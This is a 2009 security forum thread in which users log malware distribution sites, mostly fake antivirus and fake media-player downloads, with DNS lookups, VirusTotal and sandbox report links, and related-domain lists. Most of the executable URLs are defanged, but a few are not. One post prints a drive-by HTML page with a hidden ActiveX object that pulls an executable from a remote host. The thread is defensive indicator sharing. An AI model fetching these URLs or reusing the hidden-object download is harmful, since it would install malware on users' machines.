Request: GET /reg.aspx?query=E4C6D5AAA39AA1A9A7AF9499A0A1A4B1A6ACA8979D716FEDCAE4A2A9A2A79EA2A29FA0747EDCE3D7DDC7DCDEDCE5B5DDCF9D9698
Response: 200 "OK"

resulted in these downloads
Code: [Select]
hxxp://207.159.133.42/images/v2/51.exe
hxxp://207.159.133.42/images/v2/card.exe
hxxp://207.159.133.42/images/v2/ffxi.exe
hxxp://207.159.133.42/images/v2/wow.exe
hxxp://207.159.133.42/images/v2/sk5.exe


qiqijs.com
edulands.com
toptravelsinfo.com




Title: Re: Mr Clean's dirt
Post by: MysteryFCM on July 01, 2009, 01:30:38 pm
207.159.133.42 is imm.cc;

http://www.malwarebytes.org/forums/index.php?showtopic=18421&pid=94505&st=0&#entry94505

http://hosts-file.net/?s=207.159.133.42&view=matches
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 01, 2009, 02:59:17 pm
Code: [Select]
$ curl hxxp://www.betheboss.it/Featured/FCKeditor/editor/edit.txt

hxxp://207.159.133.42/images/v2/51.exe;hxxp://207.159.133.42/images/v2/card.exe;hxxp://207.159.133.42/images/v2/ffxi.exe;hxxp://207.159.133.42/images/v2/wow.exe;hxxp://207.159.133.42/images/v2/sk5.exe;

$ dig www.betheboss.it +short
74.9.2.85


betheboss.it

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 01, 2009, 04:51:42 pm
Code: [Select]
$ curl hxxp://elfah.net/jacon/css/xxcutea.htm

<br>
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<br>
<br>

<object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365" codebase="hxxp://www.qiqijs.com/gm/gm.exe#version=1,0,0,002"  width="0" height="0">
</object>qiqijs.com
</body>
</html>


elfah.net
qiqijs.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 03, 2009, 11:49:51 am
Code: [Select]
hxxp://26860xfart.cn/Win.exe

$ dig 26860xfart.cn +short
213.182.197.229

http://www.virustotal.com/analisis/c04b3d12befe80368dd5d725582a3bac662666001af7e042b25716ddc6042472-1246621029 2/40
http://anubis.iseclab.org/?action=result&task_id=18690a67c39a37f74f9ff6d8fbdd1604a

http://www.malwaredomainlist.com/mdl.php?search=213.182.197&colsearch=All&quantity=50


http://research.sunbelt-software.com/ViewMalware.aspx?id=9296270&cs=9FBA269829B3E171C7F855BC659E6232



26860xfart.cn
02fgu145501.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 03, 2009, 04:10:44 pm
Code: [Select]
192.168.4.4  - - [ 3/Jul/2009:14:42:43 +0000] "GET http://ncnzfh.info/n.cgi?bdt HTTP/1.1" - - "http://ad.yieldmanager.com/
iframe3?6ycAAIo6CQCuLycAAAAAAF31CgAAAAAAAgAAAAYAAAAAAP8AAAAGC0F0BgAAAAAATlsPAAAAAADZoA8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAADvtgIAAAAAAAIAAwAAAAAAZmZmZmZmxj9mZmZmZmbGP2ZmZmZmZsY.ZmZmZmZmxj8AAAAAAADQPwAAAAAAANA.AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAh7V0YP2WBvpQfyTVZ2XdGdsopOYLpW5gsnvqAAAAAA==,,http://ads.specificmedia.com/serve/v=5;m=3;l=3732;c=19459;b=96913;ts=20090703104230;p=ui%3daxpg_lf0ert-na%3btr%3decdchjrzouf%3btm%3d0-0" "Mozilla/4.0 (compatible;MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

192.168.4.4  - - [ 3/Jul/2009:14:42:43 +0000] "GET http://ncnzfh.info/n.cgi?glYySWyWKWKKZKSKKKRYRgllliKeueeYeWiFKYZSeiFSWFZZKWeFeRYlSFSjKKKKKKKKKK HTTP/1.1" - - "http://ncnzfh.info/n.cgi?bdt" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"



Code: [Select]
hxxp://ncnzfh.info/n.cgi?glYySWyWKWKKZKSKKYRYRgllliKeueeYeWiFKYZSeiFSWSKKKWKyKXKKKKKKKKWjK0

$ dig ncnzfh.info +short
216.150.79.74

http://www.virustotal.com/analisis/2ac2a718a8d97706dcfecad4f4e5731fbc109d1cb5d549385593113de55a1a45-1246636591 5/40

http://anubis.iseclab.org/?action=result&task_id=1024cd4a6ef99f034c1562a7f847b884d&format=html
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9298995&cs=FFEFBE23D00087AF7A57D9E89EA1EEFB

ncnzfh.info
specificmedia.com
yieldmanager.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 06, 2009, 04:29:43 pm
Code: [Select]
hxxp://bot.anhheo.com/IEupdate.exe

$ dig bot.anhheo.com +short
174.120.28.58

http://www.virustotal.com/analisis/a5371fbafe46d3efc9a135503d0d2d16f2b04de8069f8dca89f05cfc819a2873-1246897157 5/40


anhheo.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 06, 2009, 04:31:53 pm
Code: [Select]
$ curl hxxp://www3.99yb.com/gygydf.txt
50056.exe
10062.exe
526.exe
504.exe
496.exe
479.exe
529.exe
20021.exe
20023.exe
30021.exe

$ dig www3.99yb.com +short
98.126.41.188

happy digging

99yb.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 02:51:22 pm
Code: [Select]
hxxp://abjodvsves.com/cgi-bin/index.cgi?lskMOVVZZzZZsZrZZMCOArZEuCZEZZZZZZZZZMVuzzEFMlZZZzZkZlZZZZZZZZzrZ0

$ dig abjodvsves.com +short
208.116.54.18

http://www.virustotal.com/analisis/a6ab535b211c4448ee9885c5e57d9b43edd54f3bb4eb8265e3a20efe75c2fcbb-1246977553 1/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9364855&cs=46B6E0D9C9DA79086F1D691FE62BF623

TCP port 443 connects to IP 208.116.54.18

abjodvsves.com
208.116.54.18

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 02:55:26 pm
Code: [Select]
hxxp://www.google-cdma.com/js.exe

$ dig www.google-cdma.com +short
125.46.58.10

http://www.virustotal.com/analisis/7f3088b0e86840ed9fb1597486297f387a65f75ed17013abf385a1e0dd390f05-1246977655 15/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9347478&cs=80EC66388251618BAC43FB0CD3F1CA0F
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 05:41:50 pm
Code: [Select]
hxxp://weelshow.com/download/5761384b73513d3d5da244ae20090701/Two.Moon.Junction.(1988).exe

$ dig weelshow.com +short
213.163.66.241

http://www.virustotal.com/analisis/488c7f5e217039ed49293a9ce9419057225a182c9c2ee07bf75aee920509a422-1246988599 12/41
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 07, 2009, 08:58:50 pm
Code: [Select]
hxxp://soft-exe.net/Vtask.45089.exe

$ dig soft-exe.net +short
64.20.38.172

http://www.virustotal.com/analisis/6275d2941d090c02ab688fe8800cfa5d74b91a9f62f0a61259c55f7b4b5df15f-1247000409 2/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9369838&cs=1ACA9142F82C693A728A663813C77EF7

connect to TCP port 80 on IP 64.27.5.202


soft-exe.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 10, 2009, 02:41:58 pm
Code: [Select]
hxxp://gartnerdedault.cn/go.php?id=2002-08&key=9ba00f58f&p=1

$ dig gartnerdedault.cn +short
78.47.91.155

redirects to:

Code: [Select]
hxxp://antiviruspcscannerv7.com/download/Setup-15815_02002-8.exe

$ dig antiviruspcscannerv7.com +short
78.47.132.222
78.47.172.69

http://www.virustotal.com/analisis/88727e4a5e8d16101d286ed8e8e4f0fdf6ade9377a972ac0af8e8999e35041d8-1247236645 0/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9429660&cs=2E52D1D5E37CF0C65B98BA4928C22E4F


gartnerdedault.cn
antiviruspcscannerv7.com
satisfatcionvulture.com
thebigben.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 10, 2009, 06:33:30 pm
Code: [Select]
hxxp://secure-safe-download.com/5/11/0/wsetup.exe

$ dig secure-safe-download.com +short
89.149.254.174

http://www.virustotal.com/analisis/40170a81178a604a528fd2215bdea9ebe1ddd40265d163ed0be68d4517f6a4f7-1247159488 11/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9409223&cs=018F2BC9E718BF761D643DF7068681A0


secure-safe-download.com
check-updates.net
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 10, 2009, 10:48:39 pm
Code: [Select]
hxxp://exe-cosmos.com/onlinemovies.40016.exe

$ dig exe-cosmos.com +short
64.20.38.172

http://www.virustotal.com/analisis/a24cc53a95501ffdf70b2712abb0f8e13fea811ec2ddb641a055873c16cc4906-1247265378 9/40

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9434014&cs=B2C55B968A70077BCF8BED716B449CB2


exe-cosmos.com
myart-gallery.com
isyouimageshere.com
imgesinstudioonline.com
yourimagesstudio.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 14, 2009, 02:12:10 pm
http://wepawet.iseclab.org/view.php?hash=6493b8dbd04fab6e4de6109f977ebc8e&t=1247579272&type=js


r-d-cgpay-090709.com
Title: Re: Mr Clean's dirt
Post by: MysteryFCM on July 14, 2009, 03:03:44 pm
Interesting ........ one of the IP's in the report, is claiming to be a dialup line;

http://hosts-file.net/?s=217.124.41.76

PTR: 76.red-217-124-41.dialup.dynamic.ccgg.telefonica.net
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 14, 2009, 05:55:50 pm
Code: [Select]
192.168.1.2 - - [14/Jul/2009:17:13:09 +0000] "GET http://picnews.bij.plhttp://picnews.bij.pl/movierol22.gif HTT
P/1.0" - - "http://picnews.bij.pl/?q=?amanda+rodrigues+gatti+photo" "Mozilla/4.0 (compatible; MSIE 7.0; Windows
NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"

http://wepawet.iseclab.org/view.php?hash=a1bd725d55c1e4637f663970f2239bff&t=1247594082&type=js

Code: [Select]
hxxp://rstdeals.com/download/6c715a5261673d3d173590f820090701/mediaplayer.exe

$ dig rstdeals.com +short
91.214.45.73

http://www.virustotal.com/analisis/cbee9bee4d83f8bc52787bfdcbf9911cf3df4471e6ea15108e657bcc87251714-1247592269 8/41

http://www.threatexpert.com/report.aspx?md5=8745485ec12fe7af7700cbc20ec75cc9



rstdeals.com
picnews.bij.pl
scanforthreats.us    <- inactive at the moment


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 14, 2009, 06:43:42 pm
Code: [Select]
192.168.1.2 - - [14/Jul/2009:18:30:26 +0000] "GET hxxp://freeexefiles.com/onlinemovies.40070.exe HTTP/1.0" - - "hxxp://thetubesmovie.com/xplays.php?id=40070" "Mozilla/4.0 (compatible; MSIE 7.0; Windo
ws NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"


Code: [Select]
hxxp://freeexefiles.com/onlinemovies.40070.exe

$ dig freeexefiles.com +short
64.20.38.172


http://www.virustotal.com/analisis/c354e76f803d078f7ae3fd0adbe2ed5958bd9b5b5a0a486e6eb14edc0c2261ff-1247596825 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9530564&cs=74B69D8941BA70BB34F1F9640FACA542

http://www.threatexpert.com/report.aspx?md5=65ddc99913e9e4dfa11e6990b26d5425



freeexefiles.com
myart-gallery.com
isyouimageshere.com
imgesinstudioonline.com
yourimagesstudio.com
imagesrepository.com
robert-art.com
superarthome.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 15, 2009, 08:09:42 pm
Code: [Select]
hxxp://power-virus-scannerv2.com/download/Setup-e173d08_02020-1.exe

$ dig power-virus-scannerv2.com +short
83.133.126.155
78.46.251.41
69.4.230.205
94.102.48.29


http://www.virustotal.com/analisis/464febd4104dd7571bd7812a5f134157ce3316289570c1b5e7e69974e60e6f23-1247681424 4/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9552069&cs=0A2868C7866B630F3484BBD0543FAD42


power-virus-scannerv2.com
maltaintravels.com
symlabssoftwareupdate.com
maliciousbaseupdates.com
antimalwareaupdateserver.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 21, 2009, 06:25:07 pm
not unknown, just more evidence...

Code: [Select]
hxxp://youtube-adult.name/id_0084.exe

$ dig youtube-adult.name +short
210.51.181.129

http://www.virustotal.com/analisis/706741621eb3bc2caaf2e416d0f40e16385c8e0ae7eab683c46a8bcde677338a-1248200200 24/41
http://www.threatexpert.com/report.aspx?md5=f8a7d2cf3e4a052329079788f634f1b7



youtube-adult.name
porno-tube-xxx.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 21, 2009, 07:33:55 pm
Code: [Select]
hxxp://beauty-hot-pornxxx.com/nsc/TubeViewer.ver.6.48103.exe

$ dig beauty-hot-pornxxx.com +short
213.182.197.237

http://www.virustotal.com/analisis/a9b1d7ef815d810be52314a5364faf557e4e90ddd07c93ef701b524a0621c3ca-1248204907 6/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9713550&cs=D783E99FD76935850511E59E26A472BF
http://www.threatexpert.com/report.aspx?md5=a4a54368395bbed4d352fb7f73844c0d

in good company
http://www.malwaredomainlist.com/mdl.php?search=213.182.197.237&colsearch=All&quantity=50


beauty-hot-pornxxx.com
uptodatesystem.com
free-media-club.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 22, 2009, 09:05:07 pm
Code: [Select]
hxxp://bestdomus.com/Klitecodec.exe

$ dig bestdomus.com +short
216.39.57.104


http://www.virustotal.com/analisis/5fa7fd2271ba0c8b394a2089c519f95dfe896e1084f5bec949d7a6f086a5cb73-1248296258 22/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9729309&cs=9EB07AAE538861D525A48AE40AC3AEAE


bestdomus.com
safetywirelessonline.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 05:05:07 pm
Code: [Select]
hxxp://cbbugltjud.com/progs/wirfjaosw/udvvmquz.php

$ dig cbbugltjud.com +short
195.2.253.240

http://www.virustotal.com/analisis/88a16c7111f34b863e34396b4e3c422780c4ff096492cc525eb8cce97950e094-1248368774 2/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9731454&cs=E79036E68BE605ABF26D88AE362A5E62


cbbugltjud.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 06:10:30 pm
Code: [Select]
http://download-filez-now.us/s/w01386bd673n72g77v/setup.exe

$ dig download-filez-now.us +short
89.149.254.174

http://www.virustotal.com/analisis/8bbf6ebda069a5f4c4d893651ed5898b391a714bc0487d69f4956019c8de24ff-1248372725 3/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9731663&cs=50477CB05BBE69B759E0778327FE310B


download-filez-now.us
uptodatesystem.com
smart-antivirus-online.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 08:51:21 pm
Code: [Select]
http://codesdonlk.us/keygen/Keygen.BumpTop.Pro.1.05.exe

$ dig codesdonlk.us +short
221.5.74.45

http://liffils.us/download/Keygen.BumpTop.Pro.1.05.exe

$ dig liffils.us +short
221.5.74.45

http://www.virustotal.com/analisis/4cfd739786c2ca9ff79315724ab4fe6861863a6d2e9dbbc3dbc43afbb8136977-1248379966 14/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9732020&cs=F5FD4802D8021C4D7CEE7DA3AEB3AE9C


codesdonlk.us
liffils.us
loadd.in
justcounter.name
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 09:00:10 pm
Code: [Select]
hxxp://load-exe-world.com/streamviewer.45043.exe

$ dig load-exe-world.com +short
95.211.8.20

http://www.virustotal.com/analisis/9c85ba346f4a493c32340412885480488e7138bb0e123f66057c4e1c0ae69d23-1248383000 6/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9732021&cs=5DE963CCE05610A8427EB2B1F571DB1E


load-exe-world.com
myart-gallery.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 09:06:36 pm
Code: [Select]
hxxp://personalfolderscanv2.com/download/Setup-f524_02009-1480.exe

$ dig personalfolderscanv2.com +short
78.46.251.41
94.102.48.29
83.133.126.155
91.212.107.5

http://www.virustotal.com/analisis/3139d23b6f5dd10f5bc199083e301b666124b6354f3996359bcae8b24ed54805-1248379533 2/40


personalfolderscanv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 23, 2009, 09:24:20 pm
Code: [Select]
hxxp://download-filez-now.us/s/w01386bd673n72g77v/setup.exe

$ dig download-filez-now.us +short
89.149.254.174

http://www.virustotal.com/analisis/baa415cd20d9e4913816145228ea101305689e6933f7384327a7e976353d97ed-1248384226 3/40
http://research.sunbelt-software.com/ViewMalware.aspx?id=9732028&cs=D1C7DC51B600C5CB8CB7E769D2B107F3


download-filez-now.us
uptodatesystem.com
smart-antivirus-online.com



Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 27, 2009, 08:35:21 pm
Code: [Select]
hxxp://securedvirusproscanner.com/download/Install-6a1e7_02022.exe

$ dig securedvirusproscanner.com +short
83.133.126.155
78.46.251.41
91.212.107.5
94.102.48.29

http://www.virustotal.com/analisis/467b01e3604eded9d203e0cb2d957ed2d15df9447e0f91ca17fc4f7b15695696-1248720946  1/40
http://research.sunbelt-software.com/ViewMalware.aspx?id=9739472&cs=11D05E946C6644353F02A3B04D8BB76D


securedvirusproscanner.com
electronicniche.com
recentsoftwareupdates.com
1worldupdatesserver.com
system-updatesv5.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 28, 2009, 10:30:52 pm
Code: [Select]
hxxp://exe-file-xxx.com/onlinemovies.1.48397.exe

$ dig exe-file-xxx.com +short
64.20.55.163

http://www.virustotal.com/analisis/97533855e26c45b0597cf97a69cab392b016a1ace49c5a17ef0df3187659075d-1248820234 4/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9741020&cs=DA9CD313E98036AB8ED57EEA8550AF76

exe-file-xxx.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 29, 2009, 12:01:27 am
Code: [Select]
hxxp://silicatinc.com/download/6a49356553413d3d3f064cd820090722/Flash.Player.HD.v10.0.exe

$ dig silicatinc.com +short
91.214.45.73

http://www.virustotal.com/analisis/696b00ae512a20b6fbd3c904bac521b4b202a41aa634f48ab4ec9be8b7100853-1248825350 14/41
http://www.threatexpert.com/report.aspx?md5=f91ed38c8e3eaa7159563a6706adcaf0


silicatinc.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 29, 2009, 10:03:48 pm
Code: [Select]
hxxp://software-updatesv6.com/Driver.exe

$ dig software-updatesv6.com +short
89.47.237.52

http://www.virustotal.com/analisis/e46ab1b5ae8d39d492cf9644eecdc706628a3ac039cadb3dc5b7fbd42d7d04d2-1248901187 7/41
http://www.threatexpert.com/report.aspx?md5=bca2e8d7c692ee851f089a192caeee3b
http://research.sunbelt-software.com/ViewMalware.aspx?id=9756186&cs=04B0552AD670D0EEC3EBE842E1EDEBF1



software-updatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 31, 2009, 02:34:49 pm
Code: [Select]
hxxp://privatevirusscannerv8.com/download/Install-683a841_02004.exe
hxxp://privatevirusscannerv8.com/download/Install-041e1_02004.exe

$ dig privatevirusscannerv8.com +short
94.102.48.29
83.133.126.155
91.212.107.5

http://www.virustotal.com/analisis/a2477036f5829a49587b9ba10edace4fe6a831e88ee11c0803255bf308abdb64-1249050966 1/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9789358&cs=96127053A4291A1D31EDEA24FC73825E
http://www.threatexpert.com/report.aspx?md5=97c28477dea3b3265e382c95346b5bc7


privatevirusscannerv8.com
goldmine-sachs.com
defenderbaseupdatesv2.com
thebigben.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on July 31, 2009, 03:55:54 pm
Code: [Select]
hxxp://filesexe.com/onlinemovies.1.48397.exe

$ dig filesexe.com +short
95.211.8.20

http://www.virustotal.com/analisis/7453a4c4a552e27ce6e92c02789c113f756b61c8a33404c13620296c553cde26-1249055795 10/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9790105&cs=E4A8A8089077AD2EBC7DFD6A54F30C93
http://anubis.iseclab.org/?action=result&task_id=1059254c7e1282b444dae6331fd25651a&format=html
http://www.threatexpert.com/report.aspx?md5=4e91cc044591a0b9f62cba048dd1f017


filesexe.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 02, 2009, 07:53:07 pm
Code: [Select]
hxxp://online-pro-scan.com/download/Install-27ab1_2001-30.exe

$ dig online-pro-scan.com +short
78.47.172.66
209.44.126.52
88.198.41.170

http://www.virustotal.com/analisis/76e5ed76b5a573cc8fb8f18d8c3b2717916f0d7133cf09154d6299e2da8e0d4b-1249173034 2/41
http://anubis.iseclab.org/?action=result&task_id=1e0beaf59d1b4ba243de3752a514e7168
http://research.sunbelt-software.com/ViewMalware.aspx?id=9821621&cs=4B4540B9C4A6BEC5B4C92BBF50DE63A7

online-pro-scan.com
challenges-cup.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 03, 2009, 12:31:12 am
Code: [Select]
hxxp://212.117.174.14/racing.exe

http://www.virustotal.com/analisis/415c1520662f4bc3291816d6af4469f89df6f0966ac9bdb6f8a1999b27db9953-1249259122 14/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9825512&cs=C597128F2D8896770F01E456644D74E6
http://anubis.iseclab.org/?action=result&task_id=1b38d6578a8c104a4752500ec64c31d2a


Code: [Select]
hxxp://core2623.racingmoney-0110.com/d_program_all.cgi?host=host&id=0

$ dig core2623.racingmoney-0110.com +short
95.169.190.147

http://www.virustotal.com/analisis/828835fb4b8ecc5064a0f6496ba160d37a32022dee7f82a0c8b275d312620b15-1249258832 11/40
http://anubis.iseclab.org/?action=result&task_id=122149ecee9f30814cda563c8e90a21ec
http://research.sunbelt-software.com/ViewMalware.aspx?id=9825487&cs=4F7A583CE43B3220C9E7C292612F9A0B



racingmoney-0110.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 04, 2009, 01:51:21 pm
Code: [Select]
192.168.1.10 - - [ 4/Aug/2009:13:29:39 +0000] "GET http://synthetic-electric.cn/go.php?id=2003-03&key=e20dfa513&p=1 HTTP/1.1" - - "http://whitepg-images.adbureau.net/whitepg/2009-07%20hotel_728x90.swf?clickTag=http://atl.whitepages.com/accipiter/adclick/CID=0000533400000" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
192.168.1.10 - - [ 4/Aug/2009:13:29:39 +0000] "GET http://onlinesecurityscanv11.com/1/?sess==W219jDwOS0zJmlwPTY1LjEyMy4xOS42MiZ0aW1lPTEyNDMzMkIMNQkO HTTP/1.1" - - "http://whitepg-images.adbureau.net/whitepg/2009-07%20hotel_728x90.swf?clickTag=http://atl.whitepages.com/accipiter/adclick/CID=0000533400000" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
192.168.1.10 - - [ 4/Aug/2009:13:29:40 +0000] "GET http://onlinesecurityscanv11.com/1/img/jquery.js HTTP/1.1" - - "http://onlinesecurityscanv11.com/1/?sess==W219jDwOS0zJmlwPTY1LjEyMy4xOS42MiZ0aW1lPTEyNDMzMkIMNQkO" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"


Code: [Select]
hxxp://onlinesecurityscanv11.com/download/Install-0c6_2003-3.exe

$ dig onlinesecurityscanv11.com +short
88.198.41.170
209.44.126.52
78.47.172.66

http://www.virustotal.com/analisis/bd424b5f474ae9ef45daae7cb9064403497c187fc5b168b2fe859b27ac979379-1249393866 7/41

http://research.sunbelt-software.com/ViewMalware.aspx?id=9872536&cs=57BD3287F84998C9C7604E984A6956BF

http://anubis.iseclab.org/?action=result&task_id=11526942bdf3251a4597dd8e67e0cebd9


onlinesecurityscanv11.com
challenges-cup.com
systemupdatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 05, 2009, 07:33:00 pm
Code: [Select]
hxxp://nucleargaming.net/errorlogs/aleluia.gif

$ file aleluia.gif
aleluia.gif: MS-DOS executable, MZ for MS-DOS

$ dig nucleargaming.net +short
209.25.133.225

http://www.virustotal.com/analisis/7fdadabb4922f008671d7a156acb8f8812814f156b7bffb22a82ef4c7a766ef3-1249424356 16/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9916879&cs=30A50ABCF454C2FE158BBE92ABE6350E


nucleargaming.net
ekeye.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 06, 2009, 03:07:40 pm
Code: [Select]
hxxp://exeeasy.com/flash-plugin.45054.exe

$ dig exeeasy.com +short
95.211.8.20

http://www.virustotal.com/analisis/56c77236208755639cff2d30e2923cace9b578dcb55a9281b2365c79696a5e1e-1249571269 3/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9938576&cs=AC880A64B083A963D87B0F3A8F56DF8B
http://anubis.iseclab.org/?action=result&task_id=1cd8e3c8dc84f3b449912c607698e7cf4


exeeasy.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 06, 2009, 05:24:52 pm
Code: [Select]
hxxp://gofastscanner.com/download/Install-420d_2003-3.exe

$ dig gofastscanner.com +short
88.198.41.170
209.44.126.52
78.47.172.66

http://www.virustotal.com/analisis/27517370ea2e189c619bea5bd11afdacef7f4781b3a00989e598e5e3de39c113-1249577337 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=9941812&cs=CA6C79071187BA84AB4E181F5E372678


bitmap files?   
Code: [Select]
hxxp://baseprogrammupdatesv5.com/logo.bmp

$ file logo.bmp
logo.bmp: data

Code: [Select]
hxxp://windefenderbaseupdate.com/template.bmp

$ file template.bmp
template.bmp: data



gofastscanner.com
keyboard-mouse-fun.com
baseprogrammupdatesv5.com
windefenderbaseupdate.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 06, 2009, 06:00:25 pm
Code: [Select]
hxxp://govirusscanner.com/download/Install-1408e_2031.exe

$ dig govirusscanner.com +short
91.212.107.5
94.102.48.29
188.40.61.236
83.133.126.155
94.102.51.26

http://www.virustotal.com/analisis/8cdb3d69147640c82c8b1657ba90c5da3ecb1ee0eec5d6fc6ec23c07953f6f6c-1249581622 0/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9942677&cs=7DCBC5364B93941949240365756C7FFB


govirusscanner.com
june-crossover.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 07, 2009, 02:31:59 pm
I can be just as relentless

Code: [Select]
hxxp://gomalwarescanner.com/download/Install-fa6bb14_2003-3.exe

$ dig gomalwarescanner.com +short
88.198.41.170
78.47.172.66
209.44.126.52

http://www.virustotal.com/analisis/c007ad216705e73b58c260ab049ba00a91745f0b092b1b29db1c8b360874df31-1249652331 2/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=9987227&cs=B9EBAC0B6ECE5BFB9A45F608B027555B


gomalwarescanner.com
keyboard-mouse-fun.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 02:16:48 pm
Code: [Select]
hxxp://top1959.cn/PC_protect.exe

$ dig top1959.cn +short
211.95.78.98

http://www.virustotal.com/analisis/f9c3f064210f83bc8d240208e12b87ce624d40bc29f7d1e6b9d1de3392c40322-1249994080 27/41
http://www.threatexpert.com/report.aspx?md5=4cabecc7fc8b024b4be8239721a4baec
http://anubis.iseclab.org/?action=result&task_id=1e49cbc6207b52b64859636457ce0f47b&format=html


top1959.cn
rubimbablo.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 02:52:54 pm
Code: [Select]
hxxp://wfoto.front.ru/fotos.com

$ dig wfoto.front.ru +short
ftp.front.ru.
82.204.219.224

http://www.virustotal.com/analisis/2044851a8ec36f76359fc31233071be8f9d348d91a73a47fddde6a575c4f7246-1250001993 18/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10081211&cs=384D6631678577C784F7B7ABCD8BF452
http://anubis.iseclab.org/?action=result&task_id=154ac9b98fc08fa54bddb70df6868e0d8&format=html

Code: [Select]
hxxp://kede.hpg.ig.com.br/ree1.html

$ file ree1.html
ree1.html: data

hxxp://kede.hpg.ig.com.br/ree2.html

$ file ree2.html
ree2.html: data

hxxp://kedex02.hpg.ig.com.br/nl2.html

$ file nl2.html
nl2.html: data

hxxp://kedex02.hpg.ig.com.br/nl3.html

$ file nl3.html
nl3.html: data

hxxp://kedex02.hpg.ig.com.br/nl5.html

$ file nl5.html
nl5.html: data

hxxp://kedex02.hpg.ig.com.br/nl6.html

$ file nl6.html
nl6.html: data



front.ru
kedex02.hpg.ig.com.br
kede.hpg.ig.com.br


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 03:33:15 pm
Code: [Select]
hxxp://antispywarelivescanv5.com/download/Install-b85ed90_2015.exe

$ dig antispywarelivescanv5.com +short
83.133.123.174
188.40.61.236
91.212.107.5
94.102.51.26
94.102.48.29
83.133.126.155

http://www.virustotal.com/analisis/75774261b858b5963c8896b7613334ac98a6b2539c72de5babb8be969f7598da-1249982407 7/41

